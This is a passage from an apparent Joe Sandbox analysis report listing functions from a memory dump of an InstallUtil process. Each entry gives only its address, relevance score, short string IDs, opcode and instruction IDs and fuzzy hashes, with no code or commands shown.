                                                                      • Instruction Fuzzy Hash: E481B374E01258DFDB58DFAAD984A9DBBF2FF89300F148069E819AB365DB309945CF10
                                                                      Function 0157C761 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 470686a05a6cfaf9412ca2e202459cb2bb130155efeae38032a11bb8246a7e93
                                                                      • Instruction ID: 3d63ea50adf2259f508849eeff1d448ae1f97c3a95ef2b417bbd4d8041404c1e
                                                                      • Opcode Fuzzy Hash: 470686a05a6cfaf9412ca2e202459cb2bb130155efeae38032a11bb8246a7e93
                                                                      • Instruction Fuzzy Hash: 1081B474E00219DFDB58DFAAD984A9DBBF2BF89310F14C069E819AB365DB309945CF10
                                                                      Function 0157B7E2 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 30371e2bc4d5c90d3d00e3834681659925506f38493f89d6b0182207ce13ec27
                                                                      • Instruction ID: ea857621471a328e2b8a9a65cc2d3cfef7873cb2f39860bbf17618f70fce073b
                                                                      • Opcode Fuzzy Hash: 30371e2bc4d5c90d3d00e3834681659925506f38493f89d6b0182207ce13ec27
                                                                      • Instruction Fuzzy Hash: 1081A374E00218CFDB18DFAAD995A9DBBF2BF88300F14C469E419AB365DB309945CF50
                                                                      Function 0157C457 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 95a8fceeb17c112f9c3dd78a640c496b7d247a4c3e4735df0538cd59d8debf9f
                                                                      • Instruction ID: 9871d7edafbf0d16a2051aef9d8182fe5385f5f08df8fa59bae9fad325d02259
                                                                      • Opcode Fuzzy Hash: 95a8fceeb17c112f9c3dd78a640c496b7d247a4c3e4735df0538cd59d8debf9f
                                                                      • Instruction Fuzzy Hash: C381A3B4E00219CFDB18DFA9D984A9DBBF2BF88300F149469E809AB365DB319945CF10
                                                                      Function 0157B502 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: b4bd453fe68d688ad859e096e4ba20063a5ae0adccb7e156a3bcd3b2641946cd
                                                                      • Instruction ID: a73d7d863cfd2004c26ec77e9aaed2f4a4ae750378c2e7cb0c42231e73bb237a
                                                                      • Opcode Fuzzy Hash: b4bd453fe68d688ad859e096e4ba20063a5ae0adccb7e156a3bcd3b2641946cd
                                                                      • Instruction Fuzzy Hash: F761A0B4E002189FDB18DFAAD994A9DFBF2FF89300F14846AE419AB365DB305945CF50
                                                                      Function 0157C480 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: ebdb328eaae65a23a4f7e3842144907c1320616d197f588a7015241af9b6d9f4
                                                                      • Instruction ID: 8980049a700891b1d6c64588f460eeaf5232d4442077c80c425eed4540a565c3
                                                                      • Opcode Fuzzy Hash: ebdb328eaae65a23a4f7e3842144907c1320616d197f588a7015241af9b6d9f4
                                                                      • Instruction Fuzzy Hash: 3A61C6B4E002199FDB18DFAAD994A9DFBF2BF88300F14C069E418AB365DB315945CF10
                                                                      Function 0157F017 Relevance: .7, Instructions: 717COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 252a3b7eb58e86cc422522c69ceea735083cdb833ab8f7728c11e76aa2fdf875
                                                                      • Instruction ID: a3f94644d6a735ab8fdfb5ddfda507f035669728f4defc34d2f3885dca2463ba
                                                                      • Opcode Fuzzy Hash: 252a3b7eb58e86cc422522c69ceea735083cdb833ab8f7728c11e76aa2fdf875
                                                                      • Instruction Fuzzy Hash: 8772DE74E012298FDB64DF69D895BEDBBB2BB49300F1091EAD419AB355DB309E81CF40
                                                                      Function 01576E70 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                      • API String ID: 0-1932283790
                                                                      • Opcode ID: 621adc0753a95f214a79a218bd8be00a9db07921f42de07f5bd580a49b821241
                                                                      • Instruction ID: 1abb7fda12be5e4177f4a522fe58ed37513f0a81621fec4cc7545a2a2e210f88
                                                                      • Opcode Fuzzy Hash: 621adc0753a95f214a79a218bd8be00a9db07921f42de07f5bd580a49b821241
                                                                      • Instruction Fuzzy Hash: 5B126B30A006099FDB15CF69E989A9EBBF2FF48314F148569E919DB361DB30ED41CB50
                                                                      Function 01577808 Relevance: 3.2, Strings: 2, Instructions: 690COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q
                                                                      • API String ID: 0-355816377
                                                                      • Opcode ID: f58d023d3fa453fa4bfd57cc7cc14aaf12b538763b6c7d523ff96b1f068423f7
                                                                      • Instruction ID: 7e2c0fcabad7371021ad67d5b0ccd60ce33157880767cc99fcbe89eaafd3cc35
                                                                      • Opcode Fuzzy Hash: f58d023d3fa453fa4bfd57cc7cc14aaf12b538763b6c7d523ff96b1f068423f7
                                                                      • Instruction Fuzzy Hash: DA523274A10228CFEB149BA4C8A4BAEBB77FF54300F1091A9C10A6B365CF359D85DF61
                                                                      Function 01578801 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q
                                                                      • API String ID: 0-2697143702
                                                                      • Opcode ID: f2b60838564f8a844d0e783d57a5fa042a2fdbc4da3e56871f6e2df10ac9ae79
                                                                      • Instruction ID: dfc6e50f6131093b3c31f52176bec3d35880c58fe997a5b1473228e03a367116
                                                                      • Opcode Fuzzy Hash: f2b60838564f8a844d0e783d57a5fa042a2fdbc4da3e56871f6e2df10ac9ae79
                                                                      • Instruction Fuzzy Hash: BDB17F707505118FEB299B2DE85E73D3AD6FF84600F1848AAE556CF3B5DA24CC82C792
                                                                      Function 015756B0 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Hbq$Hbq
                                                                      • API String ID: 0-4258043069
                                                                      • Opcode ID: 7527d4b2265f72a9f6d040e78eeb2d1c08f2417c53904230da96d2c8418f006c
                                                                      • Instruction ID: 04e66bb24279708e9b7a0f2fe4c4df0b7df185f71dfba3c01d80ea166c523491
                                                                      • Opcode Fuzzy Hash: 7527d4b2265f72a9f6d040e78eeb2d1c08f2417c53904230da96d2c8418f006c
                                                                      • Instruction Fuzzy Hash: 3C91BF30714264CFDB199F39D858B6E7BE6BB88344F148968E946CB392EF348C41CB91
                                                                      Function 01575C10 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,bq$,bq
                                                                      • API String ID: 0-2699258169
                                                                      • Opcode ID: e4c26ea52eca371bfb48e52bde0157cbeb49f4a9fec87cb773eb0dc9567b132d
                                                                      • Instruction ID: 7c8ea6ca1a267ab80758428845a84a9baa008046fd528eaeb1af2213014d5735
                                                                      • Opcode Fuzzy Hash: e4c26ea52eca371bfb48e52bde0157cbeb49f4a9fec87cb773eb0dc9567b132d
                                                                      • Instruction Fuzzy Hash: 7B819234A201058FDB14DF6DE889A6EBBF6FF88200B5589A9D905DF361EB31E841CB50
                                                                      Function 01573428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xbq$Xbq
                                                                      • API String ID: 0-1243427068
                                                                      • Opcode ID: f8b671576b997bdb481e4c67d593eeb1a329a8b395d707696cf3208489a81df3
                                                                      • Instruction ID: 57eddc813809d85456e0607cf7c73a0401de63e6106b6d93f92b118bf2df2b74
                                                                      • Opcode Fuzzy Hash: f8b671576b997bdb481e4c67d593eeb1a329a8b395d707696cf3208489a81df3
                                                                      • Instruction Fuzzy Hash: 56310979B003248BEF9D8A7E659A27E66DBBBC4230F140839D906CB394DF74CC409791
                                                                      Function 01570C8F Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 7390f498114bd44462ec6c674b0f3f5e72b49ec8876f5576feaf3162269c6e5c
                                                                      • Instruction ID: 388904d383d92dc3c36899b175b7fae2b712fccf00eda9942063eb42a51a4dd8
                                                                      • Opcode Fuzzy Hash: 7390f498114bd44462ec6c674b0f3f5e72b49ec8876f5576feaf3162269c6e5c
                                                                      • Instruction Fuzzy Hash: C322DF74E4021ADFCB95EF64E995A9DBBB2FF48301F1085A6D809A7358DB306D85CF80
                                                                      Function 01570CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 4c701371ec437db3948088d8a341b57190a7279480be932ec106be84e6bfeca6
                                                                      • Instruction ID: 3165bb27b74eca759c314c131646657f59b9c13a38317fe2673df0cafa69e47e
                                                                      • Opcode Fuzzy Hash: 4c701371ec437db3948088d8a341b57190a7279480be932ec106be84e6bfeca6
                                                                      • Instruction Fuzzy Hash: 0E22DE74E5021ADFCB95EF64E994A9DBBB2FF48301F1085A6D809A7358DB306D85CF80
                                                                      Function 0157A660 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q
                                                                      • API String ID: 0-74704288
                                                                      • Opcode ID: fd0d4fc698862b27f200162b7cd1cdd08c45deea2b5ffb44ff95d34358f61fdc
                                                                      • Instruction ID: 8bb5334fe924ecdfb9d55633aece02e62d3065755bff64f050b915dab5029eb5
                                                                      • Opcode Fuzzy Hash: fd0d4fc698862b27f200162b7cd1cdd08c45deea2b5ffb44ff95d34358f61fdc
                                                                      • Instruction Fuzzy Hash: 87412331B002189FCB199F79E854AAEBBF6FBC8610F548569D906DB391CF309C01CBA0
                                                                      Function 0157A85F Relevance: .4, Instructions: 405COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ac48f63663a7689b5be8263e8cdc36c75a4f13564139c0839fcae42b571b7033
                                                                      • Instruction ID: 866d7e34dbc87202313745b0952e3b366a5be06271ccaf28534910f9178243d9
                                                                      • Opcode Fuzzy Hash: ac48f63663a7689b5be8263e8cdc36c75a4f13564139c0839fcae42b571b7033
                                                                      • Instruction Fuzzy Hash: 09F14D75A00215DFCB05CF6DD985AAEBBF6FF88310B1A84A9E505AB361DB31EC41CB50
                                                                      Function 01577450 Relevance: .2, Instructions: 201COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 122ef2ef592b3586b263b38445f3abc1712bd802dfb155c3a0c965f4424686c0
                                                                      • Instruction ID: e04449613bc6e1fdca6587f96ac008d31088e442272ffb6753fc710277a2487e
                                                                      • Opcode Fuzzy Hash: 122ef2ef592b3586b263b38445f3abc1712bd802dfb155c3a0c965f4424686c0
                                                                      • Instruction Fuzzy Hash: 047124347002558FDB15CF2DE899A6E7BE6BF49200F1904A9E906CF3A1EB71DD41CB90
                                                                      Function 0157CED7 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ef2f088206b332af42d139c78213c00badc5e1bfb89754a7dc4e4018fa35621
                                                                      • Instruction ID: 150d24b5badcdd411475c80a33570d7cf599eaa4c029462a4892750eab9f00ec
                                                                      • Opcode Fuzzy Hash: 0ef2f088206b332af42d139c78213c00badc5e1bfb89754a7dc4e4018fa35621
                                                                      • Instruction Fuzzy Hash: 0451CE349F53678FD31A2F22A9AC16E7FA9FB0F323B846C41A10EC50159B7154E5CB21
                                                                      Function 0157CEE8 Relevance: .2, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 786cd735f174bb9bc9a8f96d254fcf794162d1be19876be36c437a58e6db0cad
                                                                      • Instruction ID: 6d8ed67546623271714e839f1267575167f09133ca3908969b27c6335a36476d
                                                                      • Opcode Fuzzy Hash: 786cd735f174bb9bc9a8f96d254fcf794162d1be19876be36c437a58e6db0cad
                                                                      • Instruction Fuzzy Hash: B751AE349F53278FD2593F62A9AC12EBFA9FB0F327B846C41A11EC50198B7154E5CB11
                                                                      Function 0157E2E8 Relevance: .2, Instructions: 151COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5fcb821fa35d01e9ba338e265554b3a2e2a8dfc57df6dc8b6fecb356834a77e
                                                                      • Instruction ID: b13a147213c7e8674019040c136089239dcefce53633e7c2c6979d0e90367537
                                                                      • Opcode Fuzzy Hash: c5fcb821fa35d01e9ba338e265554b3a2e2a8dfc57df6dc8b6fecb356834a77e
                                                                      • Instruction Fuzzy Hash: 5E511134D01318DFDB14DFA5D999AAEBBB2FF88304F208529D809AB355DB359A85CF40
                                                                      Function 0157CD20 Relevance: .1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0d98c4cfdc2c36f5f12e67063298f9d46f62b656cfe7601398f7da45214d4952
                                                                      • Instruction ID: 019e7e362653430db6e2e675fec549991a8fc58b0064abfff1bbfaf9a761c4c8
                                                                      • Opcode Fuzzy Hash: 0d98c4cfdc2c36f5f12e67063298f9d46f62b656cfe7601398f7da45214d4952
                                                                      • Instruction Fuzzy Hash: 8D519474E01218DFDB58DFA9D58499DBBF2FF89300F208169E819AB364DB30A905CF50
                                                                      Function 01573908 Relevance: .1, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef62d0eafeeabab9399f78732db5e9087d8e85325654f8688823084c074bbc23
                                                                      • Instruction ID: 3cba88d71ff27bab1d3c7bd444ddd3800c9f9b127487dc4ae6601645e1025d05
                                                                      • Opcode Fuzzy Hash: ef62d0eafeeabab9399f78732db5e9087d8e85325654f8688823084c074bbc23
                                                                      • Instruction Fuzzy Hash: 9A51C574E01209DFCB48DFA9D59489DBBF2FF89310B209469E809AB324DB31AD42CF40
                                                                      Function 01579A73 Relevance: .1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c157be904e2d1fec60b0428b385e6ea9bb4fc8e86a234ef6e51aee8902ceef2
                                                                      • Instruction ID: 745cfcffc7c32c9fad7fc1c6f03dfe73cf3b5dfc48a35fd7521f07658cc38135
                                                                      • Opcode Fuzzy Hash: 9c157be904e2d1fec60b0428b385e6ea9bb4fc8e86a234ef6e51aee8902ceef2
                                                                      • Instruction Fuzzy Hash: 9741CD31A04259DFCF15CFA9D845AAEBFB2FF89328F048515E9059F291D371E910CBA0
                                                                      Function 01576748 Relevance: .1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80177deb043089df6d834110c4a3b4660b23c48f043549f15adbd7472a94ee78
                                                                      • Instruction ID: 7c3e5bc96878e1c776baa84ad6a03e2dbf37f4333d0e79f165773c63e0a02bd7
                                                                      • Opcode Fuzzy Hash: 80177deb043089df6d834110c4a3b4660b23c48f043549f15adbd7472a94ee78
                                                                      • Instruction Fuzzy Hash: 8341CE70A002189FEB25CF69D804BAEBBF6FB44314F04C86AE8159B252DB74DD55CBA1
                                                                      Function 0157D7DE Relevance: .1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3fc8f31c011618500d283698851754f50f8af1952b6675a65812fc40f51df498
                                                                      • Instruction ID: 8619ef35753b30439b53556bbb64444001f75783c785e634a08b2ae8a5c7f296
                                                                      • Opcode Fuzzy Hash: 3fc8f31c011618500d283698851754f50f8af1952b6675a65812fc40f51df498
                                                                      • Instruction Fuzzy Hash: 64413474D04249CFCB14DFE8E496AACFBF2BF89300F609519D419AB245D735A841CF54
                                                                      Function 0157D801 Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 696f5a4b494089f311117aac2f98062e4512a8650747ec800994e33cee716c8d
                                                                      • Instruction ID: e18533e147fa782bfabebab82ee475cb0155a4872d2626c43b3a55448af5121e
                                                                      • Opcode Fuzzy Hash: 696f5a4b494089f311117aac2f98062e4512a8650747ec800994e33cee716c8d
                                                                      • Instruction Fuzzy Hash: 13413470D01249CFCB01DFE8E485AEDFBB2BF8A300F609519E409AB255D734A841CF64
                                                                      Function 0157D77E Relevance: .1, Instructions: 107COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51569ca0f784b3fe5aa8d320a2800ef02902f0d8651e25c81fe443cd1de4e4ec
                                                                      • Instruction ID: 0817bf2296a3e2366cb4f590456199aa0438a602467fc84eab8c09d9a92b99d6
                                                                      • Opcode Fuzzy Hash: 51569ca0f784b3fe5aa8d320a2800ef02902f0d8651e25c81fe443cd1de4e4ec
                                                                      • Instruction Fuzzy Hash: 0B41FF70D01249CFDB04DFA8E495AEDFBB2BF8A310F209519E419AB245D735A881CF54
                                                                      Function 0157D630 Relevance: .1, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2f6e19b2a7113ef5c14d7145e308f37375d7131e8c8a0fee470e631e21089bb6
                                                                      • Instruction ID: 4143ea4d0f80dc6c0f3b725235367bb42db2869de40cdde53abec1d347c3b09e
                                                                      • Opcode Fuzzy Hash: 2f6e19b2a7113ef5c14d7145e308f37375d7131e8c8a0fee470e631e21089bb6
                                                                      • Instruction Fuzzy Hash: 7D410570D01209CBDB04DFAAE445AEEFBB2BF89300F24D529D408AB255DB35A941CF64
                                                                      Function 01574DD0 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4b24c7691045a8a5ec3248e1e2f9ea9bf5b14a604a3c038ff06ea5f733afa7b
                                                                      • Instruction ID: 53133105c39c7cdf8c4aef944106ae0848ce9c212deaf37fd32ef76d97313e79
                                                                      • Opcode Fuzzy Hash: a4b24c7691045a8a5ec3248e1e2f9ea9bf5b14a604a3c038ff06ea5f733afa7b
                                                                      • Instruction Fuzzy Hash: F031953165422A9FCF0A9F68E4556AF3BA2FF88210F008428FD158B354CB34DC61DB91
                                                                      Function 015776F8 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17408d812a60f2d6f3b13f7c90e282c736f56f5b9a66847563c2192918c6c66c
                                                                      • Instruction ID: 682cc8488d4a243c31a4731e9134e50299ea212c1cf5fafb7f6dd4f71eab5afe
                                                                      • Opcode Fuzzy Hash: 17408d812a60f2d6f3b13f7c90e282c736f56f5b9a66847563c2192918c6c66c
                                                                      • Instruction Fuzzy Hash: 4021F5343402104BDB19162AF49927EB6DBBFCC654F644478D806CF395EE69CC82D7C1
                                                                      Function 0157DF89 Relevance: .1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
